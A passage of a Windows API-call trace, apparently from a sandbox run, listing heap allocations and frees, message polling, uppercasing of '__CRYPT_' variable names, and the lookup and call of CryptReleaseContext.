[0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0229.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.926] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0229.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.927] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0229.927] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0229.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.928] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0229.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.929] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0229.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0229.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.930] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0229.931] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0229.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0229.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0229.932] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0229.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0229.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0229.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0229.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0229.935] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.935] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0229.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 